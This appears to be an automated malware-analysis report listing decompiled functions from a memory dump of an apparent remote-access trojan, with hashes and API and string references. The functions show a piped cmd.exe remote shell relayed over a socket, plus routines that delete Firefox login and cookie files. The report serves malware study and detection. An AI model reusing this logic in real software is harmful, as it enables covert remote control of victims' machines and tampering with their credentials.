Instruction ID: fd41d94cd3dfc1444890c4215b092c1c3f576008553dea06aebbb27a1e656c87
Opcode Fuzzy Hash: 4a0ecdc103eaf0599c16ad51cd874516491e1e01400dabd42b1375ec64feaaf7
Instruction Fuzzy Hash: 6D517D71600604FFEB208FA5CC45FAABBB9FF44705F108015FA44E61B0D7BA9955DB64

Uniqueness

Uniqueness Score: -1.00%

Function 007455EA, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283
pipesleepfileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E007455EA(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x7adce8 >  *((intOrPtr*)(_t138 + 4))) {
					E0076F114(0x7adce8);
					_t160 =  *0x7adce8 - _t147;
					if( *0x7adce8 == _t147) {
						E0074484E(0, 0x7adc60, 0);
						E0076F49E(_t160, E007927B3);
						 *_t156 = 0x7adce8;
						E0076F0D5(_t147);
					}
				}
				if( *0x7adcc8 >  *((intOrPtr*)(_t138 + 4))) {
					E0076F114(0x7adcc8);
					_t162 =  *0x7adcc8 - _t147;
					if( *0x7adcc8 == _t147) {
						E007420D5(_t98, 0x7adcf0);
						E0076F49E(_t162, E007927A9);
						E0076F0D5(_t147, 0x7adcc8);
					}
				}
				_t100 =  &_v40;
				E007420D5(_t98,  &_v40);
				_t139 = 0x7ac2d0;
				_v8 = _t98;
				_t163 =  *0x7abae2 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x7adcd0, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E00742084(_t98, _t156, 0x79f6bc);
						_push(0x62);
						_t147 = E00744AA4(_t98, 0x7adc60, _t136, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = E007794F6(_t100);
					_t140 = _t56;
					ReadFile( *0x7adcd0, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L007794F1(_t140);
						_t139 = 0x7ac2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E00742084(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E00745A14(_t98, _t107, _t136, _t172);
						_t147 = E00744AA4(_t98, 0x7adc60, _t136, _t172, 0x62,  &_v64);
						E00741FC7();
						goto L19;
					}
					_t66 = E00779510(_t140, E00741F95( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00742084(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = E00745A6F("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						E00744E0B(0x7adc60);
						CloseHandle( *0x7adcd0);
						CloseHandle( *0x7adcec);
						 *0x7abae2 = _t98;
						_t98 = 1;
						L27:
						E00741FC7();
						E00741FC7();
						return _t98;
					}
					E00745A0B(_t98, 0x7adcf0, E0077988A(_t98, _t164, "SystemDrive"));
					E00745A02(_t98, 0x7adcf0, 0x7ac2d0, "\\");
					0x7adc08->nLength = 0xc;
					 *0x7adc10 = 1;
					 *0x7adc0c = _t98;
					if(CreatePipe(0x7adce4, 0x7adccc, 0x7adc08, _t98) == 0 || CreatePipe(0x7adcd0, 0x7adcec, 0x7adc08, _t98) == 0) {
						goto L27;
					} else {
						_t151 = 0x44;
						E00771F00(0x7adc18, 0x7adc18, _t98, CreatePipe);
						0x7adc18->cb = _t151;
						 *0x7adc44 = 0x101;
						 *0x7adc48 = 0;
						 *0x7adc50 =  *0x7adce4;
						_t79 =  *0x7adcec;
						 *0x7adc54 = _t79;
						 *0x7adc58 = _t79;
						_t80 = E00741F95(0x7adcf0);
						 *0x7abae2 = CreateProcessA(_t98, E00741F95(0x7ac2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x7adc18, 0x7adcd4) != 0;
						E00745A0B(_t98, 0x7ac2d0, 0x79f6bc);
						 *0x7abae3 = 1;
						E0074498B(0x7adc60);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E00744A08("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
						E007420EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, E00741F95(0x7ac2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x7adc18, 0x7adcd4),  &_a4);
						_push(0x93);
						_t100 = 0x7adc60;
						_t147 = E00744AA4(_t98, 0x7adc60, "cmd.exe", CreateProcessA(_t98, E00741F95(0x7ac2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x7adc18, 0x7adcd4));
						Sleep(0x12c);
						_t168 =  *0x7abae2 - _t98; // 0x0
						if(_t168 == 0) {
							goto L26;
						}
						_t139 = 0x7ac2d0;
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x7abae3 & 0x000000ff;
							_t100 = _t139;
							 *0x7abae3 =  <=  ? 0 :  *0x7abae3 & 0x000000ff;
							if(E00742489() == 0) {
								_v8 = _t98;
							} else {
								E00745A02(_t98, _t139, _t139, "\n");
								E00741FAD( &_v40, _t139);
								_t52 = E00742489();
								WriteFile( *0x7adccc, E00741F95(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E00745A0B(_t98, _t139, 0x79f6bc);
							}
							Sleep(0x64);
							_t175 =  *0x7abae3 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x7adcd4->hProcess, _t98);
						CloseHandle( *0x7adcd8);
						CloseHandle( *0x7adcd4);
						goto L26;
					}
				}
			}

0x007455f3
0x007455f7
0x007455f9
0x007455fb
0x00745603
0x0074560b
0x00745612
0x00745618
0x0074561e
0x00745626
0x00745630
0x00745635
0x0074563c
0x00745641
0x0074561e
0x0074564d
0x00745655
0x0074565b
0x00745661
0x00745668
0x00745672
0x00745679
0x0074567e
0x00745661
0x0074567f
0x00745682
0x00745687
0x0074568c
0x0074568f
0x00745695
0x0074580b
0x0074580f
0x0074581c
0x00745825
0x007458c7
0x007458d1
0x007458d6
0x007458e2
0x00000000
0x007458e2
0x0074582b
0x0074582e
0x00745835
0x00745845
0x0074584e
0x007458b9
0x007458ba
0x007458c0
0x00000000
0x007458c0
0x00745853
0x00745888
0x0074588c
0x00745891
0x00745894
0x00745896
0x00745899
0x0074589a
0x0074589e
0x007458b2
0x007458b4
0x00000000
0x007458b4
0x00745862
0x00745867
0x0074586a
0x0074586c
0x00000000
0x00000000
0x00745872
0x0074587d
0x00745880
0x00745882
0x00745883
0x00000000
0x0074569b
0x0074569b
0x007456a2
0x007456a7
0x007456a9
0x00745982
0x00745987
0x00745992
0x0074599e
0x007459a4
0x007459aa
0x007459ac
0x007459af
0x007459b7
0x007459c4
0x007459c4
0x007456c2
0x007456ce
0x007456ea
0x007456f4
0x007456fe
0x00745708
0x00000000
0x00745724
0x00745726
0x0074572f
0x00745737
0x0074573f
0x00745749
0x0074575e
0x00745763
0x00745769
0x0074576e
0x00745773
0x0074579c
0x007457a3
0x007457ad
0x007457b4
0x007457c3
0x007457c4
0x007457c5
0x007457c6
0x007457ce
0x007457d3
0x007457dc
0x007457e1
0x007457e6
0x007457f2
0x007457f4
0x007457fa
0x00745800
0x00000000
0x00000000
0x00745806
0x0074580b
0x00000000
0x007458e4
0x007458ef
0x007458f2
0x007458f4
0x00745900
0x00745946
0x00745902
0x00745909
0x00745912
0x0074591e
0x00745932
0x0074593d
0x0074593f
0x0074593f
0x0074594b
0x00745951
0x00745951
0x00745964
0x00745970
0x0074597c
0x00000000
0x0074597c
0x00745708

APIs

__Init_thread_footer.LIBCMT ref: 0074563C

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

__Init_thread_footer.LIBCMT ref: 00745679
CreatePipe.KERNEL32(007ADCE4,007ADCCC,007ADC08,00000000,0079F6D4,00000000), ref: 00745704
CreatePipe.KERNEL32(007ADCD0,007ADCEC,007ADC08,00000000), ref: 0074571A
CreateProcessA.KERNEL32 ref: 0074578D
Sleep.KERNEL32(0000012C,00000093,?), ref: 007457F4
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0074581C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00745845

Part of subcall function 0076F49E: __onexit.LIBCMT ref: 0076F4A4

WriteFile.KERNEL32(00000000,00000000,?,00000000,007AC2D0,0079F6D8,00000062,0079F6BC), ref: 00745932
Sleep.KERNEL32(00000064,00000062,0079F6BC), ref: 0074594B
TerminateProcess.KERNEL32(00000000), ref: 00745964
CloseHandle.KERNEL32 ref: 00745970
CloseHandle.KERNEL32 ref: 0074597C
CloseHandle.KERNEL32 ref: 00745992
CloseHandle.KERNEL32 ref: 0074599E

Strings

cmd.exe, xrefs: 0074569B
SystemDrive, xrefs: 007456AF

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: b264dba44dc94f5117fce0d39b030f923bf531a86dcfc48bae1ec4ea14529c1d
Instruction ID: bcee7a6c1cdccf4e146f9946547a7ad5ed83adde58c5b30782528038420dcb23
Opcode Fuzzy Hash: b264dba44dc94f5117fce0d39b030f923bf531a86dcfc48bae1ec4ea14529c1d
Instruction Fuzzy Hash: 2D91E971A00204FFCB25BB74ED4A9AE7B69BBC6720B808129F402A7662DF7C5D01D775

Uniqueness

Uniqueness Score: -1.00%

Function 0074A012, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0074A012(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E007420D5(__ebx,  &_v100);
				E007420D5(__ebx,  &_v76);
				E007420D5(__ebx,  &_v28);
				_t45 = E00742084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00741FD1( &_v28, _t46, _t135, E007475C2(_t89,  &_v52, E0077988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				E00741FC7();
				E00741FC7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(E00741F95(E00747558( &_v124,  &_v28, _t142, "*")),  &_v468);
				E00741FC7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									E00741FD1( &_v100, _t61, _t136, E00745343(_t89,  &_v52, E00747558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									E00741FC7();
									E00741FC7();
									_t128 = E00747558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									E00741FD1( &_v76, _t67, _t136, E00745343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									E00741FC7();
									E00741FC7();
									_t73 = DeleteFileA(E00741F95( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(E00741F95( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00742084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E0074A6EF(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00742084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E0074A6EF(_t89,  &_v28, _t143);
					L17:
					E00741FC7();
					E00741FC7();
					E00741FC7();
					return 1;
				}
			}

0x0074a012
0x0074a012
0x0074a012
0x0074a01f
0x0074a027
0x0074a02f
0x0074a03c
0x0074a05c
0x0074a064
0x0074a06c
0x0074a07d
0x0074a09a
0x0074a09c
0x0074a0a1
0x0074a0a4
0x0074a1da
0x0074a1da
0x0074a1e8
0x0074a1ea
0x00000000
0x00000000
0x0074a0cd
0x0074a0d4
0x00000000
0x00000000
0x0074a0da
0x0074a0e0
0x0074a0e3
0x0074a0f1
0x0074a0f1
0x0074a0f7
0x0074a0f7
0x0074a0f9
0x0074a0f9
0x0074a0fd
0x0074a102
0x0074a105
0x0074a10b
0x00000000
0x00000000
0x0074a10d
0x0074a10e
0x0074a111
0x00000000
0x00000000
0x0074a113
0x0074a11c
0x0074a11c
0x0074a11e
0x0074a14e
0x0074a156
0x0074a161
0x0074a17e
0x0074a190
0x0074a19b
0x0074a1a3
0x0074a1b1
0x0074a1b7
0x0074a1b9
0x0074a1bb
0x0074a1bb
0x0074a1ca
0x0074a1d0
0x0074a1d2
0x0074a1d4
0x0074a1d4
0x0074a1d2
0x00000000
0x0074a11e
0x0074a117
0x0074a119
0x0074a119
0x00000000
0x0074a119
0x0074a0e9
0x0074a0eb
0x00000000
0x00000000
0x00000000
0x0074a0eb
0x0074a1fa
0x0074a1ff
0x0074a208
0x00000000
0x0074a0aa
0x0074a0ab
0x0074a0bb
0x0074a0c0
0x0074a20e
0x0074a211
0x0074a219
0x0074a221
0x0074a22c
0x0074a22c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0074A091
FindClose.KERNEL32(00000000), ref: 0074A0AB
FindNextFileA.KERNEL32(00000000,?), ref: 0074A1E2
FindClose.KERNEL32(00000000), ref: 0074A208

Strings

[Firefox StoredLogins not found], xrefs: 0074A0B6
UserProfile, xrefs: 0074A042
[Firefox StoredLogins Cleared!], xrefs: 0074A1F5
\key3.db, xrefs: 0074A16C
\logins.json, xrefs: 0074A12A
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0074A034

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 007f46b21840afc3166bcfc480e733e24b71cd03ffd7e3ee5a5eda26b34f1015
Instruction ID: 843d73fd21330ddb203f034b9f85ad916ddd0bba5208430738fdfeb0a48eb69c
Opcode Fuzzy Hash: 007f46b21840afc3166bcfc480e733e24b71cd03ffd7e3ee5a5eda26b34f1015
Instruction Fuzzy Hash: 8A51413195511DABCF18FB74DC5A9EEB774BF12300F800569F406A60A2FF7C5A8ACA51

Uniqueness

Uniqueness Score: -1.00%

Function 0074A22D, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0074A22D(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E007420D5(0,  &_v52);
				E007420D5(0,  &_v28);
				_t35 = E00742084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00741FD1( &_v28, _t36, _t109, E007475C2(0,  &_v76, E0077988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				E00741FC7();
				E00741FC7();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(E00741F95(E00747558( &_v100,  &_v28, _t116, "*")),  &_v444);
				E00741FC7();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E00742084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						E0074A6EF(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E00747558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											E00741FD1( &_v52, _t59, _t110, E00745343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											E00741FC7();
											E00741FC7();
											__eflags = DeleteFileA(E00741F95( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00742084(0, _t102);
					E0074A6EF(0, _t104, _t117);
					L18:
				}
				L19:
				E00741FC7();
				E00741FC7();
				return 1;
			}

0x0074a22d
0x0074a22d
0x0074a23b
0x0074a243
0x0074a250
0x0074a270
0x0074a278
0x0074a280
0x0074a291
0x0074a2ae
0x0074a2b0
0x0074a2b5
0x0074a2b8
0x0074a2eb
0x0074a2ed
0x0074a3b9
0x0074a3c3
0x0074a3c8
0x0074a3d1
0x00000000
0x0074a2f3
0x0074a2f3
0x0074a2f5
0x0074a2f5
0x0074a2fc
0x00000000
0x0074a302
0x0074a302
0x0074a308
0x0074a30b
0x0074a319
0x0074a319
0x0074a31f
0x0074a321
0x0074a321
0x0074a325
0x0074a32a
0x0074a32d
0x0074a333
0x00000000
0x00000000
0x0074a335
0x0074a336
0x0074a339
0x00000000
0x0074a33b
0x0074a33b
0x0074a33b
0x0074a344
0x0074a344
0x0074a346
0x00000000
0x0074a348
0x0074a360
0x0074a36f
0x0074a377
0x0074a37f
0x0074a393
0x0074a395
0x0074a3fd
0x0074a3ff
0x00000000
0x0074a397
0x0074a397
0x0074a39e
0x0074a3a1
0x0074a3f2
0x00000000
0x00000000
0x00000000
0x0074a3a1
0x0074a395
0x00000000
0x0074a346
0x0074a33f
0x0074a341
0x0074a341
0x00000000
0x0074a30d
0x0074a311
0x0074a313
0x00000000
0x00000000
0x00000000
0x00000000
0x0074a313
0x0074a30b
0x00000000
0x0074a3a3
0x0074a3b1
0x0074a3b1
0x00000000
0x0074a2f5
0x0074a2ba
0x0074a2bb
0x0074a2c4
0x0074a2c6
0x0074a2cb
0x0074a2cb
0x0074a2d0
0x0074a3d7
0x0074a3d7
0x0074a3d9
0x0074a3dc
0x0074a3e4
0x0074a3f0

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0074A2A5
FindClose.KERNEL32(00000000), ref: 0074A2BB
FindNextFileA.KERNEL32(00000000,?), ref: 0074A2E5
DeleteFileA.KERNEL32(00000000,00000000), ref: 0074A38D
GetLastError.KERNEL32 ref: 0074A397
FindNextFileA.KERNEL32(00000000,00000010), ref: 0074A3AB
FindClose.KERNEL32(00000000), ref: 0074A3D1
FindClose.KERNEL32(00000000), ref: 0074A3F2

Strings

[Firefox cookies found, cleared!], xrefs: 0074A3FF
UserProfile, xrefs: 0074A256
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0074A248
\cookies.sqlite, xrefs: 0074A34E
[Firefox Cookies not found], xrefs: 0074A2C6, 0074A3BE

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 532992503-432212279
Opcode ID: 5a05fd3da19c56fe855bd0b8949cf84eaccab81b46d6c24e48e59f94d506561d
Instruction ID: 4d0ea0e60dba13f42668b2b01023b51983a046b586bde0698337d1070f2d27f8
Opcode Fuzzy Hash: 5a05fd3da19c56fe855bd0b8949cf84eaccab81b46d6c24e48e59f94d506561d
Instruction Fuzzy Hash: B1416431945219ABCF14FBB4DC5ADEDB768BF12300F904169F40696092FF6C5A8AC692

Uniqueness

Uniqueness Score: -1.00%

Function 00782C8E, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00782C8E(void* __ebx, void* __edi, signed int __esi, void* __eflags, char _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				intOrPtr _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E007828CD();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E0078292B( &_v8) != 0 || E007828D3( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0077698A();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E007828CD();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E0078292B( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0077698A();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x7aa00c; // 0x67a7e35e
						_v100 = _t74 ^ _t192;
						 *0x7aa344 =  *0x7aa344 | 0xffffffff;
						 *0x7aa338 =  *0x7aa338 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x7ab748 = 0;
						_t78 = E00779895(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E0077F98C(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E00779895(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E007801F5(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E007801F5();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t172);
								E00782C8E(_t139, _t172, _t183, __eflags);
							}
						}
						E007801F5(_t183);
						__eflags = _v16 ^ _t192;
						return E0076FD1B(_v16 ^ _t192);
					} else {
						_t89 = E007828D3( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E007828FF( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E007801F5( *0x7ab740);
								 *0x7ab740 = 0;
								 *_t194 = 0x7ab750;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x7ab750 * 0x3c;
									_t167 =  *0x7ab7a4; // 0x0
									_push(_t171);
									 *0x7ab748 = 1;
									_v12 = _t150;
									__eflags =  *0x7ab796; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x7ab7ea; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x7ab7f8; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E0077F55B(0, _t167);
									_t99 = WideCharToMultiByte(_t176, 0, 0x7ab754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x7ab7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E007828C7()) = _v12;
								 *((intOrPtr*)(E007828BB())) = _v16;
								_t96 = E007828C1();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x7ab740; // 0x0
					_t8 =  &_a4; // 0x78307e
					_t178 =  *_t8;
					if(_t168 == 0) {
						L12:
						E007801F5(_t168);
						_t154 = _t178;
						_t169 = _t154 + 1;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						 *0x7ab740 = E0077F98C(_t154 - _t169, _t154 - _t169 + 1);
						_t116 = E007801F5(0);
